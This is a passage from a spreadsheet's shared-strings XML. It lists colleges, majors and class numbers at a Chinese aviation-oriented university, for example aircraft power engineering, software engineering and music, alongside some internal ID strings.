    <t xml:space="preserve">180512</t>
  </si>
  <si>
    <t xml:space="preserve">180513</t>
  </si>
  <si>
    <t xml:space="preserve">26</t>
  </si>
  <si>
    <t xml:space="preserve">法语</t>
  </si>
  <si>
    <t xml:space="preserve">180521</t>
  </si>
  <si>
    <t xml:space="preserve">24</t>
  </si>
  <si>
    <t xml:space="preserve">德语</t>
  </si>
  <si>
    <t xml:space="preserve">180531</t>
  </si>
  <si>
    <t xml:space="preserve">190511</t>
  </si>
  <si>
    <t xml:space="preserve">190512</t>
  </si>
  <si>
    <t xml:space="preserve">190513</t>
  </si>
  <si>
    <t xml:space="preserve">190521</t>
  </si>
  <si>
    <t xml:space="preserve">190531</t>
  </si>
  <si>
    <t xml:space="preserve">200511</t>
  </si>
  <si>
    <t xml:space="preserve">200512</t>
  </si>
  <si>
    <t xml:space="preserve">200513</t>
  </si>
  <si>
    <t xml:space="preserve">200521</t>
  </si>
  <si>
    <t xml:space="preserve">200531</t>
  </si>
  <si>
    <t xml:space="preserve">210511</t>
  </si>
  <si>
    <t xml:space="preserve">210512</t>
  </si>
  <si>
    <t xml:space="preserve">210513</t>
  </si>
  <si>
    <t xml:space="preserve">210521</t>
  </si>
  <si>
    <t xml:space="preserve">210531</t>
  </si>
  <si>
    <t xml:space="preserve">6</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="9"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">飞行器工程学院</t>
    </r>
    <r>
      <rPr>
        <sz val="9"/>
        <rFont val="宋体"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">(</t>
    </r>
    <r>
      <rPr>
        <sz val="9"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">航空发动机学院</t>
    </r>
    <r>
      <rPr>
        <sz val="9"/>
        <rFont val="宋体"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">)</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">17</t>
  </si>
  <si>
    <t xml:space="preserve">飞行器动力工程</t>
  </si>
  <si>
    <t xml:space="preserve">180611</t>
  </si>
  <si>
    <t xml:space="preserve">180612</t>
  </si>
  <si>
    <t xml:space="preserve">18</t>
  </si>
  <si>
    <t xml:space="preserve">飞行器设计与工程</t>
  </si>
  <si>
    <t xml:space="preserve">180621</t>
  </si>
  <si>
    <t xml:space="preserve">180622</t>
  </si>
  <si>
    <t xml:space="preserve">27FB80186A6445E98A43DAB0BD51BC7A</t>
  </si>
  <si>
    <t xml:space="preserve">飞行器动力工程（航发班）</t>
  </si>
  <si>
    <t xml:space="preserve">180651</t>
  </si>
  <si>
    <t xml:space="preserve">180652</t>
  </si>
  <si>
    <t xml:space="preserve">181621</t>
  </si>
  <si>
    <t xml:space="preserve">190611</t>
  </si>
  <si>
    <t xml:space="preserve">190612</t>
  </si>
  <si>
    <t xml:space="preserve">190613</t>
  </si>
  <si>
    <t xml:space="preserve">190614</t>
  </si>
  <si>
    <t xml:space="preserve">190621</t>
  </si>
  <si>
    <t xml:space="preserve">190622</t>
  </si>
  <si>
    <t xml:space="preserve">200611</t>
  </si>
  <si>
    <t xml:space="preserve">200612</t>
  </si>
  <si>
    <t xml:space="preserve">200613</t>
  </si>
  <si>
    <t xml:space="preserve">200614</t>
  </si>
  <si>
    <t xml:space="preserve">200621</t>
  </si>
  <si>
    <t xml:space="preserve">200622</t>
  </si>
  <si>
    <t xml:space="preserve">200623</t>
  </si>
  <si>
    <t xml:space="preserve">210611</t>
  </si>
  <si>
    <t xml:space="preserve">210612</t>
  </si>
  <si>
    <t xml:space="preserve">210613</t>
  </si>
  <si>
    <t xml:space="preserve">210614</t>
  </si>
  <si>
    <t xml:space="preserve">210615</t>
  </si>
  <si>
    <t xml:space="preserve">210621</t>
  </si>
  <si>
    <t xml:space="preserve">210622</t>
  </si>
  <si>
    <t xml:space="preserve">210623</t>
  </si>
  <si>
    <t xml:space="preserve">7</t>
  </si>
  <si>
    <t xml:space="preserve">数学与信息科学学院</t>
  </si>
  <si>
    <t xml:space="preserve">30</t>
  </si>
  <si>
    <t xml:space="preserve">数学与应用数学</t>
  </si>
  <si>
    <t xml:space="preserve">180711</t>
  </si>
  <si>
    <t xml:space="preserve">A16B22B4B6B441ED88DAEDB944C229BB</t>
  </si>
  <si>
    <t xml:space="preserve">金融数学</t>
  </si>
  <si>
    <t xml:space="preserve">180731</t>
  </si>
  <si>
    <t xml:space="preserve">190711</t>
  </si>
  <si>
    <t xml:space="preserve">190731</t>
  </si>
  <si>
    <t xml:space="preserve">200711</t>
  </si>
  <si>
    <t xml:space="preserve">200731</t>
  </si>
  <si>
    <t xml:space="preserve">210711</t>
  </si>
  <si>
    <t xml:space="preserve">210712</t>
  </si>
  <si>
    <t xml:space="preserve">8</t>
  </si>
  <si>
    <t xml:space="preserve">测试与光电工程学院</t>
  </si>
  <si>
    <t xml:space="preserve">E394D667D9074EA5B95C0C95AA6C1D17</t>
  </si>
  <si>
    <t xml:space="preserve">测控技术与仪器（无损检测方向）</t>
  </si>
  <si>
    <t xml:space="preserve">180811</t>
  </si>
  <si>
    <t xml:space="preserve">180812</t>
  </si>
  <si>
    <t xml:space="preserve">180813</t>
  </si>
  <si>
    <t xml:space="preserve">180814</t>
  </si>
  <si>
    <t xml:space="preserve">224</t>
  </si>
  <si>
    <t xml:space="preserve">测控技术与仪器（卓越计划）</t>
  </si>
  <si>
    <t xml:space="preserve">180815</t>
  </si>
  <si>
    <t xml:space="preserve">32</t>
  </si>
  <si>
    <t xml:space="preserve">测控技术与仪器</t>
  </si>
  <si>
    <t xml:space="preserve">180816</t>
  </si>
  <si>
    <t xml:space="preserve">35</t>
  </si>
  <si>
    <t xml:space="preserve">电子科学与技术</t>
  </si>
  <si>
    <t xml:space="preserve">180831</t>
  </si>
  <si>
    <t xml:space="preserve">180832</t>
  </si>
  <si>
    <t xml:space="preserve">36</t>
  </si>
  <si>
    <t xml:space="preserve">生物医学工程</t>
  </si>
  <si>
    <t xml:space="preserve">180841</t>
  </si>
  <si>
    <t xml:space="preserve">180842</t>
  </si>
  <si>
    <t xml:space="preserve">191</t>
  </si>
  <si>
    <t xml:space="preserve">光电信息科学与工程</t>
  </si>
  <si>
    <t xml:space="preserve">180851</t>
  </si>
  <si>
    <t xml:space="preserve">180852</t>
  </si>
  <si>
    <t xml:space="preserve">190811</t>
  </si>
  <si>
    <t xml:space="preserve">190812</t>
  </si>
  <si>
    <t xml:space="preserve">190813</t>
  </si>
  <si>
    <t xml:space="preserve">190814</t>
  </si>
  <si>
    <t xml:space="preserve">190815</t>
  </si>
  <si>
    <t xml:space="preserve">190831</t>
  </si>
  <si>
    <t xml:space="preserve">190832</t>
  </si>
  <si>
    <t xml:space="preserve">190841</t>
  </si>
  <si>
    <t xml:space="preserve">190842</t>
  </si>
  <si>
    <t xml:space="preserve">190851</t>
  </si>
  <si>
    <t xml:space="preserve">190852</t>
  </si>
  <si>
    <t xml:space="preserve">200811</t>
  </si>
  <si>
    <t xml:space="preserve">200812</t>
  </si>
  <si>
    <t xml:space="preserve">200813</t>
  </si>
  <si>
    <t xml:space="preserve">200814</t>
  </si>
  <si>
    <t xml:space="preserve">200815</t>
  </si>
  <si>
    <t xml:space="preserve">200831</t>
  </si>
  <si>
    <t xml:space="preserve">200832</t>
  </si>
  <si>
    <t xml:space="preserve">200841</t>
  </si>
  <si>
    <t xml:space="preserve">200842</t>
  </si>
  <si>
    <t xml:space="preserve">200851</t>
  </si>
  <si>
    <t xml:space="preserve">200852</t>
  </si>
  <si>
    <t xml:space="preserve">210811</t>
  </si>
  <si>
    <t xml:space="preserve">210812</t>
  </si>
  <si>
    <t xml:space="preserve">210813</t>
  </si>
  <si>
    <t xml:space="preserve">210814</t>
  </si>
  <si>
    <t xml:space="preserve">210815</t>
  </si>
  <si>
    <t xml:space="preserve">210831</t>
  </si>
  <si>
    <t xml:space="preserve">210832</t>
  </si>
  <si>
    <t xml:space="preserve">210841</t>
  </si>
  <si>
    <t xml:space="preserve">210842</t>
  </si>
  <si>
    <t xml:space="preserve">210851</t>
  </si>
  <si>
    <t xml:space="preserve">210852</t>
  </si>
  <si>
    <t xml:space="preserve">经济管理学院</t>
  </si>
  <si>
    <t xml:space="preserve">37</t>
  </si>
  <si>
    <t xml:space="preserve">经济学</t>
  </si>
  <si>
    <t xml:space="preserve">180911</t>
  </si>
  <si>
    <t xml:space="preserve">180912</t>
  </si>
  <si>
    <t xml:space="preserve">39</t>
  </si>
  <si>
    <t xml:space="preserve">工商管理</t>
  </si>
  <si>
    <t xml:space="preserve">180921</t>
  </si>
  <si>
    <t xml:space="preserve">180922</t>
  </si>
  <si>
    <t xml:space="preserve">40</t>
  </si>
  <si>
    <t xml:space="preserve">信息管理与信息系统</t>
  </si>
  <si>
    <t xml:space="preserve">180931</t>
  </si>
  <si>
    <t xml:space="preserve">41</t>
  </si>
  <si>
    <t xml:space="preserve">电子商务</t>
  </si>
  <si>
    <t xml:space="preserve">180941</t>
  </si>
  <si>
    <t xml:space="preserve">42</t>
  </si>
  <si>
    <t xml:space="preserve">市场营销</t>
  </si>
  <si>
    <t xml:space="preserve">180951</t>
  </si>
  <si>
    <t xml:space="preserve">187</t>
  </si>
  <si>
    <t xml:space="preserve">工业工程</t>
  </si>
  <si>
    <t xml:space="preserve">180961</t>
  </si>
  <si>
    <t xml:space="preserve">180962</t>
  </si>
  <si>
    <t xml:space="preserve">192</t>
  </si>
  <si>
    <t xml:space="preserve">会计学</t>
  </si>
  <si>
    <t xml:space="preserve">180971</t>
  </si>
  <si>
    <t xml:space="preserve">190911</t>
  </si>
  <si>
    <t xml:space="preserve">190912</t>
  </si>
  <si>
    <t xml:space="preserve">190921</t>
  </si>
  <si>
    <t xml:space="preserve">190922</t>
  </si>
  <si>
    <t xml:space="preserve">190931</t>
  </si>
  <si>
    <t xml:space="preserve">190941</t>
  </si>
  <si>
    <t xml:space="preserve">190951</t>
  </si>
  <si>
    <t xml:space="preserve">190961</t>
  </si>
  <si>
    <t xml:space="preserve">190962</t>
  </si>
  <si>
    <t xml:space="preserve">190971</t>
  </si>
  <si>
    <t xml:space="preserve">♂</t>
  </si>
  <si>
    <t xml:space="preserve">200911</t>
  </si>
  <si>
    <t xml:space="preserve">200912</t>
  </si>
  <si>
    <t xml:space="preserve">200921</t>
  </si>
  <si>
    <t xml:space="preserve">200922</t>
  </si>
  <si>
    <t xml:space="preserve">200923</t>
  </si>
  <si>
    <t xml:space="preserve">200941</t>
  </si>
  <si>
    <t xml:space="preserve">200942</t>
  </si>
  <si>
    <t xml:space="preserve">200961</t>
  </si>
  <si>
    <t xml:space="preserve">200962</t>
  </si>
  <si>
    <t xml:space="preserve">200971</t>
  </si>
  <si>
    <t xml:space="preserve">R</t>
  </si>
  <si>
    <t xml:space="preserve">210911</t>
  </si>
  <si>
    <t xml:space="preserve">210912</t>
  </si>
  <si>
    <t xml:space="preserve">210921</t>
  </si>
  <si>
    <t xml:space="preserve">210922</t>
  </si>
  <si>
    <t xml:space="preserve">210923</t>
  </si>
  <si>
    <t xml:space="preserve">210941</t>
  </si>
  <si>
    <t xml:space="preserve">210942</t>
  </si>
  <si>
    <t xml:space="preserve">210961</t>
  </si>
  <si>
    <t xml:space="preserve">210962</t>
  </si>
  <si>
    <t xml:space="preserve">210971</t>
  </si>
  <si>
    <t xml:space="preserve">体育学院</t>
  </si>
  <si>
    <t xml:space="preserve">43</t>
  </si>
  <si>
    <t xml:space="preserve">社会体育指导与管理</t>
  </si>
  <si>
    <t xml:space="preserve">181011</t>
  </si>
  <si>
    <t xml:space="preserve">181012</t>
  </si>
  <si>
    <t xml:space="preserve">191011</t>
  </si>
  <si>
    <t xml:space="preserve">191012</t>
  </si>
  <si>
    <t xml:space="preserve">201011</t>
  </si>
  <si>
    <t xml:space="preserve">201012</t>
  </si>
  <si>
    <t xml:space="preserve">211011</t>
  </si>
  <si>
    <t xml:space="preserve">211012</t>
  </si>
  <si>
    <t xml:space="preserve">土木建筑学院</t>
  </si>
  <si>
    <t xml:space="preserve">46</t>
  </si>
  <si>
    <t xml:space="preserve">土木工程</t>
  </si>
  <si>
    <t xml:space="preserve">181111</t>
  </si>
  <si>
    <t xml:space="preserve">181112</t>
  </si>
  <si>
    <t xml:space="preserve">181113</t>
  </si>
  <si>
    <t xml:space="preserve">181114</t>
  </si>
  <si>
    <t xml:space="preserve">45</t>
  </si>
  <si>
    <t xml:space="preserve">工程管理</t>
  </si>
  <si>
    <t xml:space="preserve">181121</t>
  </si>
  <si>
    <t xml:space="preserve">181122</t>
  </si>
  <si>
    <t xml:space="preserve">181123</t>
  </si>
  <si>
    <t xml:space="preserve">204</t>
  </si>
  <si>
    <t xml:space="preserve">交通工程</t>
  </si>
  <si>
    <t xml:space="preserve">181131</t>
  </si>
  <si>
    <t xml:space="preserve">181132</t>
  </si>
  <si>
    <t xml:space="preserve">191111</t>
  </si>
  <si>
    <t xml:space="preserve">191112</t>
  </si>
  <si>
    <t xml:space="preserve">191113</t>
  </si>
  <si>
    <t xml:space="preserve">191114</t>
  </si>
  <si>
    <t xml:space="preserve">191121</t>
  </si>
  <si>
    <t xml:space="preserve">191122</t>
  </si>
  <si>
    <t xml:space="preserve">191123</t>
  </si>
  <si>
    <t xml:space="preserve">191131</t>
  </si>
  <si>
    <t xml:space="preserve">191132</t>
  </si>
  <si>
    <t xml:space="preserve">201111</t>
  </si>
  <si>
    <t xml:space="preserve">201112</t>
  </si>
  <si>
    <t xml:space="preserve">201113</t>
  </si>
  <si>
    <t xml:space="preserve">201114</t>
  </si>
  <si>
    <t xml:space="preserve">201121</t>
  </si>
  <si>
    <t xml:space="preserve">L</t>
  </si>
  <si>
    <t xml:space="preserve">201122</t>
  </si>
  <si>
    <t xml:space="preserve">201123</t>
  </si>
  <si>
    <t xml:space="preserve">201131</t>
  </si>
  <si>
    <t xml:space="preserve">201132</t>
  </si>
  <si>
    <t xml:space="preserve">211111</t>
  </si>
  <si>
    <t xml:space="preserve">211112</t>
  </si>
  <si>
    <t xml:space="preserve">211113</t>
  </si>
  <si>
    <t xml:space="preserve">211114</t>
  </si>
  <si>
    <t xml:space="preserve">211121</t>
  </si>
  <si>
    <t xml:space="preserve">211122</t>
  </si>
  <si>
    <t xml:space="preserve">211123</t>
  </si>
  <si>
    <t xml:space="preserve">211131</t>
  </si>
  <si>
    <t xml:space="preserve">211132</t>
  </si>
  <si>
    <t xml:space="preserve">艺术与设计学院</t>
  </si>
  <si>
    <t xml:space="preserve">227</t>
  </si>
  <si>
    <t xml:space="preserve">环境设计</t>
  </si>
  <si>
    <t xml:space="preserve">181211</t>
  </si>
  <si>
    <t xml:space="preserve">181212</t>
  </si>
  <si>
    <t xml:space="preserve">181213</t>
  </si>
  <si>
    <t xml:space="preserve">230</t>
  </si>
  <si>
    <t xml:space="preserve">视觉传达设计</t>
  </si>
  <si>
    <t xml:space="preserve">181221</t>
  </si>
  <si>
    <t xml:space="preserve">181222</t>
  </si>
  <si>
    <t xml:space="preserve">50</t>
  </si>
  <si>
    <t xml:space="preserve">动画</t>
  </si>
  <si>
    <t xml:space="preserve">181241</t>
  </si>
  <si>
    <t xml:space="preserve">181242</t>
  </si>
  <si>
    <t xml:space="preserve">228</t>
  </si>
  <si>
    <t xml:space="preserve">服装与服饰设计</t>
  </si>
  <si>
    <t xml:space="preserve">181251</t>
  </si>
  <si>
    <t xml:space="preserve">229</t>
  </si>
  <si>
    <t xml:space="preserve">产品设计</t>
  </si>
  <si>
    <t xml:space="preserve">181261</t>
  </si>
  <si>
    <t xml:space="preserve">181262</t>
  </si>
  <si>
    <t xml:space="preserve">181263</t>
  </si>
  <si>
    <t xml:space="preserve">191211</t>
  </si>
  <si>
    <t xml:space="preserve">△</t>
  </si>
  <si>
    <t xml:space="preserve">Y</t>
  </si>
  <si>
    <t xml:space="preserve">191212</t>
  </si>
  <si>
    <t xml:space="preserve">191213</t>
  </si>
  <si>
    <t xml:space="preserve">191221</t>
  </si>
  <si>
    <t xml:space="preserve">191222</t>
  </si>
  <si>
    <t xml:space="preserve">191241</t>
  </si>
  <si>
    <t xml:space="preserve">191242</t>
  </si>
  <si>
    <t xml:space="preserve">191251</t>
  </si>
  <si>
    <t xml:space="preserve">191261</t>
  </si>
  <si>
    <t xml:space="preserve">191262</t>
  </si>
  <si>
    <t xml:space="preserve">201211</t>
  </si>
  <si>
    <t xml:space="preserve">201212</t>
  </si>
  <si>
    <t xml:space="preserve">201213</t>
  </si>
  <si>
    <t xml:space="preserve">201221</t>
  </si>
  <si>
    <t xml:space="preserve">201222</t>
  </si>
  <si>
    <t xml:space="preserve">201223</t>
  </si>
  <si>
    <t xml:space="preserve">201241</t>
  </si>
  <si>
    <t xml:space="preserve">201242</t>
  </si>
  <si>
    <t xml:space="preserve">201261</t>
  </si>
  <si>
    <t xml:space="preserve">201262</t>
  </si>
  <si>
    <t xml:space="preserve">211211</t>
  </si>
  <si>
    <t xml:space="preserve">211212</t>
  </si>
  <si>
    <t xml:space="preserve">211221</t>
  </si>
  <si>
    <t xml:space="preserve">211222</t>
  </si>
  <si>
    <t xml:space="preserve">211223</t>
  </si>
  <si>
    <t xml:space="preserve">211241</t>
  </si>
  <si>
    <t xml:space="preserve">211242</t>
  </si>
  <si>
    <t xml:space="preserve">211261</t>
  </si>
  <si>
    <t xml:space="preserve">211262</t>
  </si>
  <si>
    <t xml:space="preserve">11B74152BE4740A187CE794D4BEBE58F</t>
  </si>
  <si>
    <t xml:space="preserve">工艺美术</t>
  </si>
  <si>
    <t xml:space="preserve">211271</t>
  </si>
  <si>
    <t xml:space="preserve">文法学院</t>
  </si>
  <si>
    <t xml:space="preserve">59</t>
  </si>
  <si>
    <t xml:space="preserve">法学</t>
  </si>
  <si>
    <t xml:space="preserve">181421</t>
  </si>
  <si>
    <t xml:space="preserve">48</t>
  </si>
  <si>
    <t xml:space="preserve">公共事业管理</t>
  </si>
  <si>
    <t xml:space="preserve">181431</t>
  </si>
  <si>
    <t xml:space="preserve">*</t>
  </si>
  <si>
    <t xml:space="preserve">W</t>
  </si>
  <si>
    <t xml:space="preserve">181432</t>
  </si>
  <si>
    <t xml:space="preserve">60</t>
  </si>
  <si>
    <t xml:space="preserve">新闻学</t>
  </si>
  <si>
    <t xml:space="preserve">181441</t>
  </si>
  <si>
    <t xml:space="preserve">181442</t>
  </si>
  <si>
    <t xml:space="preserve">127</t>
  </si>
  <si>
    <t xml:space="preserve">播音与主持艺术</t>
  </si>
  <si>
    <t xml:space="preserve">181451</t>
  </si>
  <si>
    <t xml:space="preserve">181452</t>
  </si>
  <si>
    <t xml:space="preserve">191421</t>
  </si>
  <si>
    <t xml:space="preserve">▼</t>
  </si>
  <si>
    <t xml:space="preserve">191431</t>
  </si>
  <si>
    <t xml:space="preserve">191432</t>
  </si>
  <si>
    <t xml:space="preserve">191441</t>
  </si>
  <si>
    <t xml:space="preserve">191442</t>
  </si>
  <si>
    <t xml:space="preserve">191451</t>
  </si>
  <si>
    <t xml:space="preserve">191452</t>
  </si>
  <si>
    <t xml:space="preserve">A6862262D7B9430A9EE9EE2DBDF936B6</t>
  </si>
  <si>
    <t xml:space="preserve">广播电视编导</t>
  </si>
  <si>
    <t xml:space="preserve">191461</t>
  </si>
  <si>
    <t xml:space="preserve">201421</t>
  </si>
  <si>
    <t xml:space="preserve">201431</t>
  </si>
  <si>
    <t xml:space="preserve">201432</t>
  </si>
  <si>
    <t xml:space="preserve">201441</t>
  </si>
  <si>
    <t xml:space="preserve">201442</t>
  </si>
  <si>
    <t xml:space="preserve">201451</t>
  </si>
  <si>
    <t xml:space="preserve">201452</t>
  </si>
  <si>
    <t xml:space="preserve">201461</t>
  </si>
  <si>
    <t xml:space="preserve">211421</t>
  </si>
  <si>
    <t xml:space="preserve">211431</t>
  </si>
  <si>
    <t xml:space="preserve">211432</t>
  </si>
  <si>
    <t xml:space="preserve">211441</t>
  </si>
  <si>
    <t xml:space="preserve">211442</t>
  </si>
  <si>
    <t xml:space="preserve">211451</t>
  </si>
  <si>
    <t xml:space="preserve">211452</t>
  </si>
  <si>
    <t xml:space="preserve">211461</t>
  </si>
  <si>
    <t xml:space="preserve">15</t>
  </si>
  <si>
    <t xml:space="preserve">音乐学院</t>
  </si>
  <si>
    <t xml:space="preserve">55</t>
  </si>
  <si>
    <t xml:space="preserve">音乐学</t>
  </si>
  <si>
    <t xml:space="preserve">181511</t>
  </si>
  <si>
    <t xml:space="preserve">CA262AA6146247F78B37812CF6E4ACCA</t>
  </si>
  <si>
    <t xml:space="preserve">舞蹈学</t>
  </si>
  <si>
    <t xml:space="preserve">181521</t>
  </si>
  <si>
    <t xml:space="preserve">203</t>
  </si>
  <si>
    <t xml:space="preserve">表演（空中乘务）</t>
  </si>
  <si>
    <t xml:space="preserve">181531</t>
  </si>
  <si>
    <t xml:space="preserve">///#</t>
  </si>
  <si>
    <t xml:space="preserve">181532</t>
  </si>
  <si>
    <t xml:space="preserve">181533</t>
  </si>
  <si>
    <t xml:space="preserve">181534</t>
  </si>
  <si>
    <t xml:space="preserve">191511</t>
  </si>
  <si>
    <t xml:space="preserve">191512</t>
  </si>
  <si>
    <t xml:space="preserve">191521</t>
  </si>
  <si>
    <t xml:space="preserve">191531</t>
  </si>
  <si>
    <t xml:space="preserve">191532</t>
  </si>
  <si>
    <t xml:space="preserve">191533</t>
  </si>
  <si>
    <t xml:space="preserve">191534</t>
  </si>
  <si>
    <t xml:space="preserve">201511</t>
  </si>
  <si>
    <t xml:space="preserve">201512</t>
  </si>
  <si>
    <t xml:space="preserve">201521</t>
  </si>
  <si>
    <t xml:space="preserve">201531</t>
  </si>
  <si>
    <t xml:space="preserve">201532</t>
  </si>
  <si>
    <t xml:space="preserve">201533</t>
  </si>
  <si>
    <t xml:space="preserve">201534</t>
  </si>
  <si>
    <t xml:space="preserve">211511</t>
  </si>
  <si>
    <t xml:space="preserve">211512</t>
  </si>
  <si>
    <t xml:space="preserve">211521</t>
  </si>
  <si>
    <t xml:space="preserve">211531</t>
  </si>
  <si>
    <t xml:space="preserve">211532</t>
  </si>
  <si>
    <t xml:space="preserve">211533</t>
  </si>
  <si>
    <t xml:space="preserve">211534</t>
  </si>
  <si>
    <t xml:space="preserve">通航学院（民航学院）</t>
  </si>
  <si>
    <t xml:space="preserve">68A6506FF3784F8B9799F3E84E8F5311</t>
  </si>
  <si>
    <t xml:space="preserve">飞行器制造工程（航空维修工程与技术方向）</t>
  </si>
  <si>
    <t xml:space="preserve">180631</t>
  </si>
  <si>
    <t xml:space="preserve">180632</t>
  </si>
  <si>
    <t xml:space="preserve">231</t>
  </si>
  <si>
    <t xml:space="preserve">飞行技术</t>
  </si>
  <si>
    <t xml:space="preserve">180641</t>
  </si>
  <si>
    <t xml:space="preserve">180642</t>
  </si>
  <si>
    <t xml:space="preserve">180643</t>
  </si>
  <si>
    <t xml:space="preserve">180644</t>
  </si>
  <si>
    <t xml:space="preserve">181611</t>
  </si>
  <si>
    <t xml:space="preserve">181612</t>
  </si>
  <si>
    <t xml:space="preserve">181613</t>
  </si>
  <si>
    <t xml:space="preserve">181614</t>
  </si>
  <si>
    <t xml:space="preserve">191611</t>
  </si>
  <si>
    <t xml:space="preserve">191612</t>
  </si>
  <si>
    <t xml:space="preserve">191613</t>
  </si>
  <si>
    <t xml:space="preserve">191614</t>
  </si>
  <si>
    <t xml:space="preserve">191621</t>
  </si>
  <si>
    <t xml:space="preserve">191622</t>
  </si>
  <si>
    <t xml:space="preserve">191623</t>
  </si>
  <si>
    <t xml:space="preserve">191624</t>
  </si>
  <si>
    <t xml:space="preserve">201611</t>
  </si>
  <si>
    <t xml:space="preserve">■</t>
  </si>
  <si>
    <t xml:space="preserve">201621</t>
  </si>
  <si>
    <t xml:space="preserve">201622</t>
  </si>
  <si>
    <t xml:space="preserve">201623</t>
  </si>
  <si>
    <t xml:space="preserve">201624</t>
  </si>
  <si>
    <t xml:space="preserve">211611</t>
  </si>
  <si>
    <t xml:space="preserve">211621</t>
  </si>
  <si>
    <t xml:space="preserve">211622</t>
  </si>
  <si>
    <t xml:space="preserve">211623</t>
  </si>
  <si>
    <t xml:space="preserve">211624</t>
  </si>
  <si>
    <t xml:space="preserve">D9D0079648BE448D8D7F13F2F15941B2</t>
  </si>
  <si>
    <t xml:space="preserve">飞行器适航技术</t>
  </si>
  <si>
    <t xml:space="preserve">211631</t>
  </si>
  <si>
    <t xml:space="preserve">20</t>
  </si>
  <si>
    <t xml:space="preserve">软件学院</t>
  </si>
  <si>
    <t xml:space="preserve">65</t>
  </si>
  <si>
    <t xml:space="preserve">软件工程</t>
  </si>
  <si>
    <t xml:space="preserve">182011</t>
  </si>
  <si>
    <t xml:space="preserve">182012</t>
  </si>
  <si>
    <t xml:space="preserve">182013</t>
  </si>
  <si>
    <t xml:space="preserve">182021</t>
  </si>
  <si>
    <t xml:space="preserve">182041</t>
  </si>
  <si>
    <t xml:space="preserve">182042</t>
  </si>
  <si>
    <t xml:space="preserve">182051</t>
  </si>
  <si>
    <t xml:space="preserve">182061</t>
  </si>
  <si>
    <t xml:space="preserve">217</t>
  </si>
  <si>
    <t xml:space="preserve">物联网工程</t>
  </si>
  <si>
    <t xml:space="preserve">182071</t>
  </si>
  <si>
    <t xml:space="preserve">182072</t>
  </si>
  <si>
    <t xml:space="preserve">182073</t>
  </si>
  <si>
    <t xml:space="preserve">B0D2496066C441BBA5B37DF517AA6825</t>
  </si>
  <si>
    <t xml:space="preserve">数据科学与大数据技术</t>
  </si>
  <si>
    <t xml:space="preserve">182081</t>
  </si>
  <si>
    <t xml:space="preserve">192011</t>
  </si>
  <si>
    <t xml:space="preserve">192012</t>
  </si>
  <si>
    <t xml:space="preserve">192013</t>
  </si>
  <si>
    <t xml:space="preserve">192014</t>
  </si>
  <si>
    <t xml:space="preserve">192015</t>
  </si>
  <si>
    <t xml:space="preserve">192016</t>
  </si>
  <si>
    <t xml:space="preserve">192051</t>
  </si>
  <si>
    <t xml:space="preserve">192061</t>
  </si>
  <si>
    <t xml:space="preserve">192071</t>
  </si>
  <si>
    <t xml:space="preserve">192072</t>
  </si>
  <si>
    <t xml:space="preserve">192073</t>
  </si>
  <si>
    <t xml:space="preserve">192081</t>
  </si>
  <si>
    <t xml:space="preserve">202011</t>
  </si>
  <si>
    <t xml:space="preserve">202012</t>
  </si>
  <si>
    <t xml:space="preserve">202013</t>
  </si>
  <si>
    <t xml:space="preserve">202014</t>
  </si>
  <si>
    <t xml:space="preserve">202015</t>
  </si>
  <si>
    <t xml:space="preserve">202016</t>
  </si>
  <si>
    <t xml:space="preserve">202017</t>
  </si>
  <si>
    <t xml:space="preserve">202061</t>
  </si>
  <si>
    <t xml:space="preserve">202071</t>
  </si>
  <si>
    <t xml:space="preserve">202072</t>
  </si>
  <si>
    <t xml:space="preserve">202073</t>
  </si>
  <si>
    <t xml:space="preserve">202081</t>
  </si>
  <si>
    <t xml:space="preserve">202082</t>
  </si>
  <si>
    <t xml:space="preserve">212011</t>
  </si>
  <si>
    <t xml:space="preserve">212012</t>
  </si>
  <si>
    <t xml:space="preserve">212013</t>
  </si>
  <si>
    <t xml:space="preserve">212014</t>
  </si>
  <si>
    <t xml:space="preserve">212015</t>
  </si>
  <si>
    <t xml:space="preserve">212016</t>
  </si>
  <si>
    <t xml:space="preserve">212017</t>
  </si>
  <si>
    <t xml:space="preserve">2005</t>
  </si>
  <si>
    <t xml:space="preserve">软件工程（陆孝彭班）</t>
  </si>
  <si>
    <t xml:space="preserve">212019</t>
  </si>
  <si>
    <t xml:space="preserve">212061</t>
  </si>
  <si>
    <t xml:space="preserve">212071</t>
  </si>
  <si>
    <t xml:space="preserve">212072</t>
  </si>
  <si>
    <t xml:space="preserve">212073</t>
  </si>
  <si>
    <t xml:space="preserve">212081</t>
  </si>
  <si>
    <t xml:space="preserve">212082</t>
  </si>
  <si>
    <t xml:space="preserve">国际教育学院</t>
  </si>
  <si>
    <t xml:space="preserve">C672079774B245719AA6788CACE240BA</t>
  </si>
  <si>
    <t xml:space="preserve">电子信息工程（中外合作）</t>
  </si>
  <si>
    <t xml:space="preserve">182211</t>
  </si>
  <si>
    <t xml:space="preserve">182212</t>
  </si>
  <si>
    <t xml:space="preserve">76C0B443B50643068920EC8CD9378D12</t>
  </si>
  <si>
    <t xml:space="preserve">电子信息工程（光电方向）（中外合作）</t>
  </si>
  <si>
    <t xml:space="preserve">182213</t>
  </si>
  <si>
    <t xml:space="preserve">182214</t>
  </si>
  <si>
    <t xml:space="preserve">232</t>
  </si>
  <si>
    <t xml:space="preserve">环境工程（中外合作）</t>
  </si>
  <si>
    <t xml:space="preserve">182251</t>
  </si>
  <si>
    <t xml:space="preserve">182252</t>
  </si>
  <si>
    <t xml:space="preserve">218</t>
  </si>
  <si>
    <t xml:space="preserve">英语（中外合作）</t>
  </si>
  <si>
    <t xml:space="preserve">182271</t>
  </si>
  <si>
    <t xml:space="preserve">219</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="9"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">工商管理</t>
    </r>
    <r>
      <rPr>
        <sz val="9"/>
        <rFont val="宋体"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">(</t>
    </r>
    <r>
      <rPr>
        <sz val="9"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">中外合作</t>
    </r>
    <r>
      <rPr>
        <sz val="9"/>
        <rFont val="宋体"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
